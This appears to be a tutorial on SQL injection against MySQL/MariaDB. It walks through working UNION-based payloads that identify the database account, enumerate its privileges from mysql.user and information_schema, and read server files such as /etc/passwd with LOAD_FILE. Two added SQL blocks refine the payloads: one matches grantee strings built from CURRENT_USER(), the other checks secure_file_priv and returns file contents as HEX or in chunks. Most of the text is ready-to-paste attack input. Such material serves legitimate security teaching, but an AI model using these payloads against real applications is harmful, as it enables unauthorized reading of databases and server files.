Privileges
We first need to find out what privileges our user has within the database.
DB User
Use the following queries to find out which DB user the application connects as:
SELECT USER()
SELECT CURRENT_USER()
SELECT user FROM mysql.user
USER() returns the name the client supplied when connecting, while CURRENT_USER() returns the account the server actually matched and whose privileges apply; the two can differ, so check both. Reading mysql.user only works if our account already has SELECT access to the mysql system database.
The injection payload should look like this:
cn' UNION SELECT 1, user(), 3, 4-- -
Or:
cn' UNION SELECT 1, user, 3, 4 FROM mysql.user-- -
User Privilege
Now that we know our user, we can start looking for what privileges we have.
To test for super admin privilege:
SELECT super_priv FROM mysql.user
The injection payload should look like this:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
This returns one row per account, with Y or N in the super_priv column. To see the privilege for a certain user:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
We can also dump the other privileges we have directly from the schema. This works even when we cannot read mysql.user, since information_schema.user_privileges typically shows at least the current account's own global grants:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
Again, we can search for a specific user. Note that grantee is stored in the quoted form 'user'@'host', so the value has to be matched exactly in that form:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
If we see the FILE privilege listed for our user, we can proceed with attempting to read files.
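The queries above hard-code 'root'@'localhost', but the account the application connects as is often something else. The following is an added example, not code from the original page: it builds the grantee string from CURRENT_USER() itself, so the same query finds the FILE privilege for whatever account we are running as. It assumes a MySQL/MariaDB backend and the same 4-column UNION injection point used on the page; the user variable @me is only a convenience for testing in a lab mysql client, since the injected version must inline the expression.

```sql
-- Added example (not from the original page): enumerate the global privileges
-- of the account the application actually connects as.

-- 1. CURRENT_USER() looks like 'app@%'. information_schema.user_privileges
--    stores the same account as 'app'@'%', so rebuild that form with QUOTE()
--    around each half. (@me is a lab convenience; see the payload in step 4.)
SET @me := CONCAT(QUOTE(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)), '@',
                  QUOTE(SUBSTRING_INDEX(CURRENT_USER(), '@', -1)));
SELECT @me AS my_grantee;

-- 2. Every global privilege of that account, collapsed into one cell with
--    GROUP_CONCAT so a single injected request shows the whole list.
--    user_privileges lists each privilege as its own row (an ALL PRIVILEGES
--    account shows FILE, SUPER, SELECT, ... individually).
SELECT grantee, GROUP_CONCAT(privilege_type ORDER BY privilege_type) AS privs
FROM information_schema.user_privileges
WHERE grantee = @me
GROUP BY grantee;

-- 3. A plain yes/no for the privilege the file-reading step depends on.
SELECT COUNT(*) > 0 AS has_file_priv
FROM information_schema.user_privileges
WHERE privilege_type = 'FILE'
  AND grantee = @me;

-- 4. Step 2 rewritten for the page's injection point (sent as one line):
cn' UNION SELECT 1, grantee, GROUP_CONCAT(privilege_type), 4 FROM information_schema.user_privileges WHERE grantee=CONCAT(QUOTE(SUBSTRING_INDEX(CURRENT_USER(),'@',1)),'@',QUOTE(SUBSTRING_INDEX(CURRENT_USER(),'@',-1))) GROUP BY grantee-- -
```

Using CURRENT_USER() rather than USER() matters here: if the application authenticates as 'app'@'10.0.0.5' but the matching account is 'app'@'%', only the latter string appears in grantee.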
LOAD_FILE
The LOAD_FILE() function can be used in MariaDB/MySQL to read data from files. It requires the FILE privilege, the file must be readable by the OS user the database server runs as, the path must be allowed by the server's secure_file_priv setting, and the file must be smaller than max_allowed_packet; if any of these conditions fails, or the file does not exist, LOAD_FILE() silently returns NULL rather than raising an error.
It works as such:
SELECT LOAD_FILE('/etc/passwd');
We can use it in a UNION injection like below:
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
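Because LOAD_FILE() returns NULL for every failure mode, an empty cell in the page tells us nothing by itself. The following is an added example, not code from the original page: it first reads the server settings that gate LOAD_FILE(), then reads the file in a form that distinguishes NULL from an empty file and survives being reflected into HTML. It assumes a MySQL/MariaDB backend, the page's 4-column injection point, and '/etc/passwd' as the target file.

```sql
-- Added example (not from the original page): check LOAD_FILE() prerequisites,
-- then read a file robustly through the UNION injection.

-- 1. Server-side limits. secure_file_priv: '' means any path is allowed,
--    NULL means file operations are disabled, a directory means only files
--    under it can be read. LOAD_FILE() also returns NULL for files larger
--    than max_allowed_packet.
SELECT @@secure_file_priv   AS file_dir,
       @@max_allowed_packet AS max_bytes,
       @@version            AS server;

-- 2. Read the file. Label NULL explicitly so "no FILE privilege", "not
--    readable by the mysqld OS user", "outside secure_file_priv" and "does
--    not exist" do not all look like a blank cell. HEX() keeps binary bytes
--    and characters such as '<' and '>' from being altered by the page that
--    reflects the result; decode on the client with: xxd -r -p
SELECT IFNULL(HEX(LOAD_FILE('/etc/passwd')), 'LOAD_FILE returned NULL') AS content;

-- 3. If the application truncates long cells, page through the file in
--    fixed-size chunks (SUBSTRING positions are 1-based; this is bytes 1-1000).
SELECT SUBSTRING(LOAD_FILE('/etc/passwd'), 1, 1000) AS chunk1;

-- 4. Steps 1 and 2 as payloads for the page's injection point:
cn' UNION SELECT 1, @@secure_file_priv, @@max_allowed_packet, 4-- -
cn' UNION SELECT 1, IFNULL(HEX(LOAD_FILE('/etc/passwd')), 'LOAD_FILE returned NULL'), 3, 4-- -
```

Note that the file is read from the database server's filesystem, not the web server's; when the two run on different hosts, paths such as the web application's source tree will not be there.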